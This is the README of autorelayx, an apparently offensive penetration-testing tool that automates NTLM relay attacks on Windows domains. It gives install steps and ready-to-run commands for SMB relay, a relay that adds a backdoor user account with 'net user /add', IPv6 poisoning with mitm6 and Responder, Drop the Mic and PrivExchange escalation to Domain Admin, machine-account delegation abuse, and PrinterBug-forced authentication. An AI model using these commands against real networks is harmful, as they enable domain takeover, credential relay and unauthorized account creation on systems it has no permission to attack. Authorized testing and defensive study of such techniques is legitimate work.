
Automatically perform advanced NTLM hash relay attacks

Primary LanguagePython


Automates the process of setting up advanced relaying techniques.


sudo apt-get install tcpdump python2 python3
pip install pipenv
git clone --recurse-submodules https://github.com/Coalfire-Research/autorelayx

Open the file autorelayx/tools/PrivExchange/httpattack.py. Replace the string "dev.testsegment.local/myattackerurl/" with your local IP address (run ip a to find your local IP). The modified line should look something like: attacker_url = '' where is your actual local IP.

cd autorelayx
cp tools/PrivExchange/httpattack.py tools/impacket/impacket/examples/ntlmrelayx/attacks/httpattack.py
sudo pipenv install --three
sudo pipenv shell
cd tools/impacket
pip install .


SMB relay

Hostlist should be formatted in CIDR notation ( or individual IPs separated by a newline. This will scan the hosts in the hostlist for any that do not have SMB signing enabled and write them to unsigned-smb-hosts.txt. Runs ntlmrelayx.py and Responder.

python autorelayx.py -l <hostlist.txt>

SMB relay with a custom command and without checking SMB signing.

python autorelayx.py -tf <targets_file.txt> -c <"net user /add danmcinerney P@ssword123456">

IPv6 poisoning

This will run ntlmrelayx, Responder, and mitm6. The -i argument is optional and specifies the interface to use for both Responder and mitm6. The -d is optional but suggested to use to limit mitm6's responses.

python autorelayx.py -l <hostlist.txt> -6 -d <domain for mitm6 to poison> -i <interface>

Drop the Mic

Escalate a domain user that you have the password for to Domain Admin. Script will test the exchange server(s) for vulnerability to SpoolService RPC abuse for the Drop the Mic attack.

python autorelayx.py --remove-mic -dc <domain controller IP/hostname> -u <DOMAIN/user:password> -sf <exchange_servers.txt>

python autorelayx.py --remove-mic -dc <domain controller IP/hostname> -u <DOMAIN/user:password> -s <Exchange IP/hostname>


Escalate a domain user that you have the password for to Domain Admin.

python autorelayx.py --privexchange -dc <domain controller IP/hostname> -u <DOMAIN/user:password> -s <exchange server IP/hostname>

Passwordless PrivExchange

If you don't have a domain user's password you can try performing the passwordless PrivExchange attack

python autorelayx.py --httpattack -s <exchange server IP/hostname>

Passwordless PrivExchange attack coupled with mitm6 poisoning on specific domain

python autorelayx.py --httpattack -s <exchange server IP/hostname> -6 -d <domain for mitm6 to poison>


Requires no domain credentials. Creates a new machine account, prints the username and password of the new machine account, and modifies its delegation rights. Upon success, please use getST.py from impacket to relay the delegation and gain access to the machine account.

python autorelayx.py --delegate -dc <domain controller IP/hostname>

Domain controller delegation

Requires 2 domain controllers, at least one of which must be vulnerable to PrinterBug, and a domain user's credentials. Forces the PrinterBug-vulnerable domain controller to authenticate to the attacker which is relayed to the other domain controller. A machine account is created and given delegation rights. Upon success, user can use getST.py from impacket to impersonate a domain admin on the newly created machine.

python autorelayx.py --delegate-dc -dc <domain controller IP/hostname> -s <PrinterBug-vulnerable domain controller> -u <DOM/user:password>